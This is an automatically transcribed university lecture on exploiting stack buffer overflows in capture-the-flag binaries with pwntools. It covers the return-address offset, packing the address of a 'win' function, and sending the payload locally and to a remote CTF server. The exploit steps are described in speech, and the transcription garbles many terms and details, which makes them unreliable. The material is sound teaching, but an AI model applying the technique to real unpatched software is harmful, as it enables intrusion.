So my plan, my plan is to talk out parameters in 64 and 32-bit programs. And I think that, you know, maybe just maybe showing you, just making this up on the spot so it might be completely crazy to do so another, okay, All right, That's cool. Static. Okay. Alright, cool. So anytime there's a moment like that, I, I, my mind does go to an intelligence agency, probably a little on the paranoid side. So you want to, okay, oops, string, this string. So here's my plan is to talk out with calling conventions in 64 bit, 32 bit and like dives through that. But after Monday, like I said, if you stare at this, it should be clear. The idea of the very first buffer overflow problems, which is a lot of the poems that you'll find when you go out to start training. If you go to pico CTF for potable dot KR or whatever, something like that. If you wanted to start going self-paced, There's one little thing missing. And that's just kinda tool set the Python side of it. Which is like, how is it that I do this stuff in Python in order to send exactly the right characters in the unprintable characters there. So I was tempted to do a thing that I wasn't planning to do right now. Just show you my toolchain for how to do remote exploits. So that if you feel like we're going too slow, I can keep going with my pace and I'm at now. But if you want to be self-directed because you agree with me and all the rest of your classes are useless and this one's fun. Then you want to be able to let go faster and I don't want a bottleneck your speed, right? So that was my thinking is like maybe on bottleneck you want to go faster than I'm doing on your own. I always like to read ahead and then go to the class and then it validates what I know rather than like, wait like an empty vessel and hear what it is for the first time or whatever, something like that. We think, should I say to my schedule plan, which is calling conventions? Or would you like to see the first exploit tool chain? So then you can maybe go self-direct yourself by going through problem sets and stuff. So basically, I can teach you pawn tools, which is how I do this in competitions. Or keep up with the intellectual pricing points. Alright? Alright. This is just so that you can self teach. So not what I had planned at all. But I think, especially if you've got stuck a PCP three, this is necessary to do PCP three because PC3 was beyond what I taught. It's a very classic kind of opening problem. Alright. So unplanned lecture, unplanned pawn tools lecture. Okay, here we go. So what is bone tools? What's it all about? Why is it what we do? And I'm going to take PCP three, which is in a live one, and probably going to violate their terms of service here. I might just do a little walk-up of PCP three in my style. In fact, they already have a write-up on it. So this is what I wanted to show you. If you've looked at this write-up on PCP three, this is a Python script. And basically this is what we do every time I need to go solve these problems. Because I need to send things that are unprincipled of exactly the right length, things like that. I've been getting any intellectual groundwork for knowing what descend and why and how to figure out what but not how the how is necessary. So I'll just do a little bit of how they'll go right back to work. Okay? So here's the how we can totally do this from repl it or something like that. In fact, if you are to do it in repl it, the one downside, if you want to do pawn tools in repl it affects, i'll, I'll show you here that's in not such a nice environment as my phone darker, I'm starting to lose a little faith and bone Docker. I think it's outdated now and I knew him. My ripples filtered shipwreck, 300 replicate notifications. I don't think anybody else has got triple digit replicate notifications. Alright. I'm going to create a ripple. Actually, yeah. So far it's been tempting to make it like a C rebel or something like that. But for Po1 tools, I want it to be a Python one. And a Python because this is, after all, a class in Python, even though it doesn't feel like it. So here is, all I'm really here for is that if I need to install something in Python, in repl it, there's this little modules cube. It doesn't exist unless I made it a python space. And if I click that, it will let me add modules. Different. Is it because I'm so zoomed in. I've done this 100 times. But this is not the interface I get. No. Oh, it's packages, not modules. They have two cubes. Dummies. Modules is not what I'm here for. I'm here for packages. Yes, this is what a master. And I can type pawn tools. I need this sort of Python CTF framework exploit development library. That's, that's what we're here for, his pawn tools. And so that'll get it for you in repl it. If you are in some other place, you can do pip install pawn tools. If you don't have PIP, then you can go install pip. This will be like, Oh, you've already got it. Oh, okay. Alright. Fine. Requirement already satisfied. Yeah, Cool. So that was pip install bone tools. Or if you're in repl it, you can go to these packages plus over here. Okay, now what is bone tools and why do I use it and et cetera, et cetera. All right, so here is the problem that I gave in PCP. Three intro buffer. Now we just learned about calling conventions. And those calling conventions or how this thing will be exploitable. So let's take a look at this main. Do you guys see the vulnerability? Scanner? Percent S scan f is okay if I say with a limit, if I can put it in the character number, whatever. But here this scan f is going to do percent s, which means it will let me write an arbitrary length string into the stack. Okay? Now what is the danger of writing an arbitrary length string and stack on 32 bytes behind the base pointer. Alright? And let's take a look at the stack. So let's go right up until that scan F. And let's inspect the stack based on what we learned Monday. Okay, so where's the base pointer? A9. So here, that's the base pointer. Can you guys respond that quickly? And I say if I'm looking at this, that it ends in 2080, 90. And here's sort of my view of the stack. Alright? If I, if I want to see more of that tuple or C, and you kind of navigate around the stack, but up and down. I don't have enough air, but J and K. Alright? So we're writing at 32 bytes behind the stack, which means that I'm going to start writing here and whatever it is I'm right is going to fill this up this way. And it's gonna go all the way up here. Now, based on our knowledge, what do you think these snake bites represent? Eight bytes just beyond the base pointer. In main? It's going to break your intuition. But from intellect only, what should be just behind the base pointer. So what not? This is the baseline is pointing right here. So they send instruction pointer. And yes, that is behind. We're not just behind what, what ends up on the stack when I'm in a function calls. So why are they saying that? They're saying, well, We know that you're going to push something onto the stack so that I know where to go back to that first one there saying, Hey, this return address is back here, but the base pointer is actually pointing right here. Why is the old base pointer also on the stack? Well, that's the first thing that happens every time I jumped into a function. I need two things to go home. I need a plane ticket home, and I need my keys, my house. So the old base pointer is how I get access to my old variables. Again, the old address is how I know where to, where to start executing again, when I go back to the function I was in. I had the old base pointer and then the address it with manor. There wasn't a lot of nodding. There's two pointers. One of them is the old base pointer, which is so that I can restore my local variables. And the other is my old address pointer, so I know where to jump back to in the middle of that function. They're both eight bytes or four bytes from 32-bit. That's important that in a 32-bit the addresses are four bytes, not 8.64 bytes or eight bytes, not for the old, the old editors. The base for all the old stuff is on the stack. Eip is pointing in some completely different address space where instructions are. Normally we don't have the same segment of memory for reading and writing as we do for reading and executing. So whenever you look at permissions and something, you're going to see read execute, but no write or read write but no execute. The stack isn't a rewrite segment normally than the opcodes are in a read execute segment. If I have read write execute, then it's only a moment in a matter of time before I've hacked it. And that's actually the next type of exploit will do is shellcode. That is, you're going to provide your opcodes and we're going to jump to them and execute. The reason I'm making you do an assembly thing, even though it's a Python class, is because when you are developing a malicious payload for millions of dollars, a lot of times what you're doing is writing shellcode and a really constrained environment. So you just kinda need to know how to put just the right commands in place so that you can have an actually executable shell code. If the ones that you download from shellcode.com or whatever don't work. So a lot of times you're in problems where you have to make shellcode, but everybody has to be given. All right, fine. Like you just end up in weird constraint environments. So, okay. Where am I here? All right, so with that in mind, what are these eight bytes? They shouldn't be RDP. That is the old base pointer. Who the hell is an old base pointer whose addresses, one. That's like my telephone number will write such a weird value to have there. Why is that we value there? Because I'm in main. You know what happens outside of main? We'll talk about what happens outside of main. That's the setup. Yes. We all have a song ahead now. But, you know, we don't we don't talk about what happens. Like it's like both of the rules. I've seen. One like tech talk that talks about what happens outside of main. And it was a really fascinating talk. But you'll just spend a whole career and never have to worry about what's outside of main. But it's all the things that the compiler does to sort of set things up or whatever out there and that land, they don't use local variables like you and me. It's not for us plebeians who must need the operating system but carry our local variables or whatever out there. Their bosses of everything, whatever they've just got completely different conventions outside of main. Right? Now, with that in mind, what are these eight bytes? No, splinters is, this year, is A9. That's when you basically are. The base pointer represents my step. What's after the old base pointer and why? Instruction pointer. And that's gonna be when I'm done with main, That's where it's going to go back to after main returns to do whatever weird things happen outside of main. Okay? So if we're in malicious mood, which I am just like, You know what? Let's put it theory anymore. Let's start hacking some crap. Then. I need to overwrite that. Okay? So let's say that you're in the mood to do your first malicious activity. Alright, great. You want to control the instruction pointer so that you can take over control of the CPU. Okay, where do you want to put it? I'm virginal events. I have no idea what I'm doing, you know, like. So the first thing you need to do is have in your mind a target that you're gonna care about. Alright, I'm gonna go, I'm gonna hit capital P to get rid of that, so I just have little more space. One of the first things that I might do when I go to reverse the programs, I want to see what other functions exist here. And in this case, it's a baby problem. And baby problems often have what I would call a function that is an add function that they've provided that they never call it. And if you could just get the instruction pointer to that function, it'll just give you the flag. Okay, cool. So when function exists, which doesn't exist in reality per se, although If you've ever heard of a one gadget, yes, When functions do exist in reality, which is that, you know, your GI libc that runs the world. But I said if you delete it, your computer will be bricked. Has in it often as many as three addresses where you can jump to that address. It's spawn the shelf where you like just a single address, self-poisoning thing. Okay. Why? Because sometimes you need to Spanish out like that's, that's the thing that gene Lindsey need to be able to do for you. And so here's where you go if you want to spawn a shell, right? Bounds. Okay? So when functions do exist in the wild, but in the CTF contexts is basically saying, Hey, I'm really just laser focusing on one type of exploit, which is a simple buffer overflow, which compilers or knew about. They don't exist in the wild, the same way that they used to when these things started. This about a 20-year-old kind of history that you're learning here, maybe a 30-year-old history. And when I described this class in April, the first half of the class, It's really interesting and you're all going to pay good attention to the first half. But they're kind of toy problems. Just like you're doing a calculus is something. I fill up a bathtub with hot water and cold water and I want to know what temperature the water consenting isn't going to do that shit. It's a toy problem in order to teach account. Back part of the class, last quarter of the class, less certain class. It's real. And all the lessons from this way problems are real. But you're all gonna get really confused. I hope not, or whatever, but it is literally trig substitutions, integrals or whatever by parts and stuff or whatever. These are all the trig functions. Real religion, and putting the real and really confused. That's right. And I hesitate like whether or not to torture you that way. So your grade will not matter about whether or not you make it past the toy stuff. But I'm going to take the time to show you the real thing because otherwise the twists up with uses not useless. Learn X86 better. You're good at problem-solving and build a little grid, that kind of thing. Oh, that's good. Metacognition on that. That's great. But the real thing, if you're actually going to make millions from it or whatever, you've got to do that real part. The real part is harder, but it's the same principle. So we're teaching with principles. The principles or this move, the instruction pointer. Have a target of where and what I call a rightward where. That is What's my strategy, communist takeover, the instruction pointer. And I'm going to drop arbitrary data into the address space of this program, right? In this case, we have a buffer overflow. All right? Almost don't exist in the wild anymore. Maybe they do. If you go to cvd.org and you just look for buffer overflow. In fact, I saw Cyber headline just the other day where VMware was getting hacked all around the world or whatever it's from a patch that came out in 2021. They should have patched, they're dumb shit, but they didn't. And so VMware's getting hacked. And the heck is a heap overflow. Okay, that's very similar to a buffer overflow, just in a different place. Alright, so it can exist, it's, it's typically compilers are good enough to protect you from that bubble, bubble. What am I saying? I'm saying this. Look at the name of that function. Read flag. Okay? If you're doing a capture the flag, I want to run that function, right? One other thing to note, if it's a, if it's a function like this, it says re-plan. In this case, I see flag that TXT and a file opener, right? Which means that I'm going to hack myself locally, which again, it's not a big deal. It's like running a XSS against myself. Who cares? Can I do an XSS against the admin? So I need to make a fake flag when I see this. Otherwise it'll fail when I get into the read flag, all my stuff is correct. I don't have a flag to reach. Hack number one. Where's the base pointer? 80, 90. Just before scanner. Where's the scan African to right? It's going to write here. Alright, so question number one on this is, how many bytes do I need to write before the next byte will corrupt the return address? How many bytes do I need to write? How long will the string do we need to provide us before I start to corrupt this return address? Seven? We go Here we go, 1234567. Nope, I'll stop there. Seven chunks is which so seven times eight or 1234, no weight, but that's fine. Alright, So I went five chunks of eight. So this is eight bytes. Bytes, a fights per eight bytes bytes. And then here, okay, now i, now, if I don't know, how do I know that I start reading here? Like, I don't know if anybody wondering that, like, Are we clear enough it sort of mastery task B to kind of see that at this point went the wrong way. My scanner. Actually one of my topics for today, but I was planning to do it's calling conventions, how to calling dimensions, work registers. The register RDI, RSI. Rdi is the first argument, RSI is the second argument. Okay, So what was looked into RSI? Var 20 H, but as far as 20 H, hex 20, which is 32 bytes before the bass player. So if I'm hacking, this is real CTF. All have this done in about 5 s, maybe, maybe 30. And I haven't done because I'm going to look at this one's going to see that 20 I'll know, I'll see that scan f percent S, hunt for a wind function. Find the address of the wind function be like, Okay, Cool. I know it's 40 byte payload. I don't even have to inspect or whatever, but for the first time, I might actually want to set a breakpoint right after the scan f and hit Continue. And it says Feed me. I'll just feed it some stuff. And I just want to look in the stack to see where is my thing and where's my target. So if I don't want to do the math, I can just sort of put a thing in and see where is my payload that I clearly recognized as mine. You can see ABCD through it added a null byte at the end of that. So this is where I start writing just as I predicted. But if you, if you couldn't follow along with the prediction, then you just do it and said, you don't have to actually do the math. And now we know that we need. How many bytes do I need before I taught the whole class and say it in unison? Zero bytes. Now, zero bytes will be like this is where I start writing. I want to know how many bytes do I write until I get there. So you're saying zero from here starts growing baby. But I've started here. 40, 40. That wasn't used in fine. Alright. Alright, 40 bytes. Okay. Now, next, what address do I want to put in? Yeah, I wanted the address of the function. Okay. Now, what's the address of the function? I can kinda just scroll up here and find it. I'll show you some cool tricks for finding it. Okay? Control C. Alright, I now know what I need to know to hack it. Alright? Now I know that I need to flag that TXT, fake leg, whatever. Alright. So I know I have a flag that Txy for it to open. Alright, so now the question is, how do I send it this address? Sorry, I'll type of clear. How do I send it that address? I can't just select, type it in and have it parsed the malicious address for me. It's not made for the hacker. The UX isn't to make my life easier. Okay? So how on earth do I send a valid address? The machine is actually going to interpret correctly. That's where Python comes in. Here's Python. I go into Python three or whatever version of Python you've got or whatever. And I almost do this reflexively almost every time I start Python, I run this line from Po1 import star. Alright. This gave me a whole lot of really cool tools. Probably I should just like import Po1. And then I can kinda see all the tools by doing tab completion. Tab completion. Maybe it's so many, it's like frozen now. I got okay. There we go. These are all the wacky tools that are in potent tools. Alright. Crc, De Bruijn sequences format, string payloads and GDB debuggers and Linux things and MD5 and whatever, and ROP gadgets and chains and sums and SSH things and etc, etc, etc, and unpack and bubble over one. I'm an IPython. Po1 dot tab. I love IPython for self-exploration. In fact, in this open-source community projects, I spent a lot of time on this weekend. You young kids are all like we should refactor the best principles. No, no, no. Give me tab completion on a global object. Because I want to go fast. My time is precious. I don't want to have to just know and reference docs or use VS Code. I'm a hacker on a server remotely. Anyway. Sorry, I didn't mean to make fun of your whole generation. But don't suck. That's all. I just don't want you to select. Like I want you to make the world not suck and codebases be cool, not bad. Okay? So step one, I'm going to say p equals process. Intro bop. Bop stands for buffer overflow, by the way. Although, yeah, buffer overflow. Okay. So here's the idea of poems, rules or whatever. Good, take the place of my terminal. Normally I would just run dot slash intro buffer to be interactive. Or two or whatever it's been like that. By the way, it does give me a process ID, which means that I can also do arts. We keep bugging while sending weird payloads. I'll show you how to do that soon ish or when. Once you start doing more hacking, this is for you to go do your own hacking at your own pace. Everybody is equal to P2, P3 after this, That's all. Okay. Now, I can type p dot receive and I get nothing. Nothing I tell you, alright, fine. P dot close. P equals process. Intro bio. Alright, now the address I wanted to write with this one. Here's a cool tool that pawn tools has. If this, by the way, in Python is just a number, right? Oh, x, whatever, that's going to evaluate it as an integer. If I have an integer which is an address, I want to format it as a string payload for a 32-bit processor or a 64-bit processor. Pawn tools as a cool little kind of process my address tool. And this is that address written as four bytes of a 32 bit Little Endian address space. Here is a 64 byte version of that address. Now you'll recognize it. The address has. Okay. Thank you. Yeah. I thought all handled by the coffee. Why? Alright. D6 here, 11 here, 40 is actually here. But hex 40 is actually principle. So it looks like an ampersand. And then, and then nobody, nobody, nobody, nobody, nobody. Okay. That's an eight byte address in little endian order. Okay? That's kinda what I'm here for is to just get that really. Yeah. Yeah, the integer version is fine. So if I do p 64 of this number, it'll, it'll make it into a string. But it must be an integer. Don't pass it a string or something. Okay? I also have the opposite. You 64. We'll take a leak. We're going to create leak soon. This class has a lot of p jokes, fine. So once we get a leak, we can undo the leak by cleaning it up or whatever. By doing use 64, undo the 64 byte address or whatever it put it back into something that I can recognize like that. Okay. Okay, so let's make a payload. What's my malicious payload? 40 bytes of junk, plus the address of the wind function. So these are the 48 bytes I want to send to that program to hack it. Okay, That's all I need. Now, I've already opened the program so I can send the payload. And there is my fake flag. So I made flag dot TXT. I didn't call it fake flags called a fake lag. Fine. But who cares, it's fake. But what happened when I did that is we overwrote the buffer. We totally smashed the stupid old base pointer that like, you know, for once I leave Maine. But that's okay. You're not going back to where you came from. You're going to where I tell you to go. They're going to reply function and it could totally crash after the read flag function. I don't care. Whenever I got my flag. One of those things you kinda get aware of is the hackers like, when will it crash from my crap? It will crash eventually. But will it crash after I've accomplished what I want? Cool, okay, right. Okay. So that's pawn tools. And that will unlock you being able to go play with real problems out there. Now, there's one part missing, which is that we need to do this on their remote server. I don't need to hack myself. I need to check them. So I'm going to close my process. Now. If you go to that problem on imaginary. All right. You got you. I swear I had like home or something. You need to go to a business lunch. It's cool. I want to go to you. Yes, you here. Alright. So you'll see that they have a write-up for you, right? Like, like Imaginary CTF is here for the same reason I am and make you more awesome, you know? And so here's your write-up. Now, they do some pretty cool shit. Sorry, I didn't need to curse There. It is so cool. Some cool stuff. This program is running on that port. Alright. Now, hacking myself locally is not as interesting as hacking them. So if I want to hack them, I can run that little script here, Netcat, their domain and the airport. Okay, hi there. Hi. You'll notice that their feed me came in later. There's a dumb reason for that. I can tell you whatever bolo block, but I've made that mistake in a CTF. Can people be like, well, I'm sorry, it's my fault I didn't flush the buffers. Alright, fine. See, flush your buffers when you're doing the CTF from. But again, they're being nice to let us hack them at all. So you made it slightly more annoying to hack, fine. Okay. But that is our program running on that port and it receives texts. Okay, so how do I now send the same payload from pawn tools? But instead of process, I replaced process with remote. And let's suppose that I don't know how to work any of this junk because you own, you can just find a command and hit question mark and it will give you, you know, documentation on, on how it works. So this thing will take in a host and a port. And there's even examples are equals remote, this on that. So this is the port number and that is the IP address. Okay, Cool. In our case, we have this, well, the second argument is the port. The first argument is Netcat. I don't really care about that, but this is their domain. Okay? I've now opened this connection to them. And I can say p dot send line my payload. Alright, yeah, that was the flags. I cleared it real quick. You can go back and pause the recording whenever he cheated. More imaginary points for you. But this is the part that's interesting here, right? We already did that. It's really that now it's the same process hacking myself as hacking them. And so the interesting one was this. Alright, within it, Seth Cohen schools. It's just a Python package that lets me interact with binaries either remotely or locally, and send them a little malicious payload, whatever. So that's enough for you to go and solve real problems that you find in places that trade. Let me show you some places we can go train. We did really well the CTF last weekend. And the only problem that wasn't solved as a pawn problem, which means that this class is the thing keeping us from being the number one team, right? So go practice, get good at that so that we can be the number one team. So if you go to pico, CTF, pico Jim, sorry, I muted myself, didn't mean to go practice. And click binary exploitation. All of these problems are available. Here's a buffer overflows zero and you can, it's running on that port. And you can grab down the binary connect, exploit, get your flag, whatever. And they even show you the source code. So that's nice. We got that going for me. I don't want to run it in Arduino land text editor is fine. So here's their source code. They do flush their stuff or whatever. They read the flag in. Alright. This is all just sort of setting up stuff and here's flushing whatever. Here's the vulnerable part. I'm going to ask for 100 characters from me with the gets. And then I'm going to call volume. And I'm going to copy your input into a 16 byte buffer. Okay, cool. So that's that. Alright. Oh, and look at this print flag. Okay, cool. So I need to do really is jump here. So there's wind function that will print the flag. But oh my gosh, oh my gosh. Look at what nice people They are. They set this up as a signal interrupt event handler, which means that literally you just have to crash the program and they'll give you the flag. It's even easier. You don't have to do any math or anything like that. You just have to write more than 16 characters, any characters, and they'll give you the flag. Okay. That is baby. Yeah. That wasn't he said I'd have to do 16 characters. And then right after the 16 begin with the address of the function as the writer is the wrong and correct them loonies wrong, he's wrong. So correct him, right. It's, it's almost, it's almost right. 16 bytes will put me at the old bay at the current base pointer. And then what do I need to do? Extra bytes for the old base pointer, the address I'm targeting is always four or eight bytes behind the bass player. For if it's 32-bit, 64-bit, then I get the address. Okay, cool. But here's the important part. I have now just unlocked 37 problems that you can go solve using pawn tools to try and mess around with this stuff. And it's really the calling conventions is why we know that there's a return address there. So we had to wait until Monday to be able to say that full story. But now you can go hack almost all the baby early pawn problems are just buffer overflow in some flavor or another or whatever, something like that. A lot of the baby ones. Okay, cool, cool, cool. Here's Buffer Overflow one. Be a little bit harder. Okay, cool. Now they say it's not running. So you click Launch Instance and they'll set up a port number for you because it's, they don't leave it running 2047, something like that. Okay, cool. Alright, so go do some practice problems like that. Self-similar imaginaries, whatever, etc. Okay, There's a couple of extra things in this poem tools that's awesome. That's worth saying. This little write-up is a bone tools that will analyze an executable linux file, which is almost everything we're working with. I wouldn't mind doing version as plastids, arm executables or something or whatever. Anybody says. Why do we keep using these unsafe languages like C or Linux or whatever? When x is in C or not the unsafe languages. They're probably safer than all you're rusty crap. I know you'd think Brussels safer, but it just has less eyeballs. Right? So anyway, fine, fine. But we're going to work in an executable file that's theater. And this cute little trick here gives me this handler EXE that I can kind of use as an in Python version of gray there too. Now what am I saying that, that take a look at what they do here. They didn't do an analysis, you don't see, you do see P6, C4. But what's the integer they put inside of these 64? Really flat. We know there's a function called read flag in there. How did they find the function reflex? Well, this little handler is basically a reverser for me in Python. So they're saying EXE dot symbols, read flag. That's a dictionary look-up dictionary of the address that is in that binary of each of its symbols. One of those symbols is the wind function called Reflex. Don't even need to use R2. Just do it all in five, right there. Or I want to see the rate error. I want to step through it. When you get this wrong, how do you debug yourself? Right now? So you guys will be frustrated by this when you go to solve one of these and you're wrong. Because it's gonna be just an off-by-one error. You're going to have 32 instead of 40 or 16 instead of 24, whatever, something like that. So I need to show you how to debug yourself so that you can figure out what you got wrong. Because computer science is all about the speed with which you can fail. Fail faster. Forgetting you triple G, one-on-ones lesson, the wrong. Fail-fast, that's our job. So you guys will suffer from this when you first start to do this, you're just going to have to go back to the whiteboard every time you get it wrong and just pack and guests. And that's gonna be really annoying and that's not code, that's not actually progress. That's just sort of hoping. So here's hoping to get it right with your first Friday resigned, but you won't. So I'm going to show you how to debug it. Fine. But this is cool shit. I can look up the symbol, read flag. I now have the address of that function. And I can put it in here, send my payload. And then this last part, interactive, that gives me back the shell control. So like if I have popped a shell on them, iodide interacted, let me be the driver again instead of getting it through Python. So I'm sending and receiving and things like that. But this, but what I really want is just come back in the driver's seat. Some crappy characters that I can't say. More like that. I can write cyclic here. That is basically their version of just putting in 40 days. That's a De Bruijn sequence that never repeats. And so just in case something crashes, you're on cyclic. You can see how many bytes deep with your secret to us. Whereas if I put all my A's and it crashes because it's trying to read an address at A-A, it's going to fail. And I will know how deep into my sequence in his reading, right? So, so if I run cyclic and I'm wrong, I can at least look at the error message. I might see the address that it's trying to interpret and know that I'm off by one. Okay. The question now. So that's pawn tools. That wasn't what I expected to talk about today, but I just think that should allow you to go at your own goat and joy and explore rather than waiting for me. My whole model is not to be sage on the stage, but to be your personal trainer. And some of you are ready to fly faster because your other classes just aren't that interesting, whatever. Okay? So you don't have to wait for the class if you've got the energy. Alright, one last thing I want to say, then it's I got five-minutes. So here's one more thing I want to say. Alright, One of the other tools that kinda comes when I installed Python tools and stuff and radio to and all that is check sec. Okay. Now this is going to touch on some of the other mastery tasks here. Oh, wait, that's my that's my task for today. Mine as well secured. But there's contrast my well secured program with intro buff. Okay. That's a lot more red for intro boss. I don't like the way this prince East to make a nice little table. Maybe I can make my table better or something, but, um, can you guys read that at the back? It's like a little bit low, right? I'll hit Clear and do the check again. Okay? Okay. This check sec program, it runs tests to see how fortified into binary. Alright, my goal in this class is that by the end, you can exploit a program where there's no obvious bulk by the developer. Fully fortified, fully green here on the latest version of G Lucy. That's my goal. That's the place where I earned the title secure software design. Fryer that if you, if you don't pay attention to that last part of the class, then you're right and thinking this is not secure software design, this is X86 exploitation. But I go the opposite way, which is to say, this is the only way to do secure software design. I don't trust anybody but hasn't seen the ways that you can trip up a program. Because if you don't know how to trip up the program, you aren't aware of the sort of salty that you shouldn't be paranoid. And you end up as a dogmatic rule follower, which makes the world worse when you go to make them all of my code in Python three and Angular to crack or whatever. Say that I understand it, right? Frustrate people. So this is fortification. You look at the mastery tasks, you'll see these words show up throughout those mastery tasks. Even though right now you don't know what all those words mean. The one I'm here to talk about is position independent execution. Alright? So this one is red there which says no position independent execution. Do you know what that means? If that is red, it means that my functions are at the same address every single time. Our whole payload that we just didn't work by knowing the address of that function. But I'm going to show you, I'm gonna write a little program real quick. I got 2 min. I can do it, I can do it. See fun, see Fun Run. Alright, let's copy prog dot C to like TIAA dot c. Okay? Dd. Okay. Actually, let's put that back. That's cool. I can have a vulnerable function. Okay? I'm just gonna do print F of the, of the address of von, actually main, hell. I'll print a couple of addresses, main Vaughn, and even print f itself. All right, so when I run this thing, it reveals to me the address where main is, my subroutine is, and where print f itself lives. Yeah. Alright, I'm gonna put three of those on the screen. Cross your eyes and tell me what changes from call to call. So what can we say and what can we say about these addresses? Every time I execute it, the middle changes every time the last few nibbles that's happened, byte, isn't it? The middle changes every time. The top is the same, the bottom is the same, the middle chains. Okay, That's address randomization. Now that when function, not only is it a silly toy problem, but when they went to make it, they put in the flag. I don't know if I'm gonna get this right. I think it's no PIE. Yes. Okay. Now, take a look at how my address is very again. Okay. Now was changing from execution, execution jargon. Like speaking in his last few seconds of glass. The function calls stay the same every single time. This is what happens if I turn off the position dependence execution. Now, if you think about this, what you guys are learning is actually the history of hacking and defenses. What I'm showing you, it's like here's where we started hacking and here's the defenses they made, and then here's where we've made the hacking next, here's the, here's where we kept taking the happening. So you're going to see this dog fight until you catch up to modern Africa. That's the, that's the plan. Say, Okay, here's how you can hack in the 90s. Here's how you can hack in 2000, 5,000, 10,020. But note the printer that is changing. So even though I made it less safe, my compiler will always be random because it's in somebody else's library. They're not doing that. Well, no, no. Okay. So just to say as you go to play, addresses might move on you. But if you see that address and starts with 40, whatever, then that one is fixed. That addresses a nice we'll address it isn't moving. It starts with 55. That's a randomized address. It's going to get moved on you. That's pretty cool. I asked for help with the KeyStore really quickly. Yep. So I have some time.
pwntools and a simple exploit
From Andrew Novocin February 22, 2023
70 plays
70
0 comments
0
You unliked the media.
Zoom Recording ID: 4159319948
UUID: TVL+SJQyTHeLEDGRadZFQA==
Meeting Time: 2023-02-22 03:10:40pmGMT
…Read more
Less…
- Tags
- Department Name
- ECE
- Department Division
- Date Established
- February 22, 2023
- Appears In
Link to Media Page
Loading
Add a comment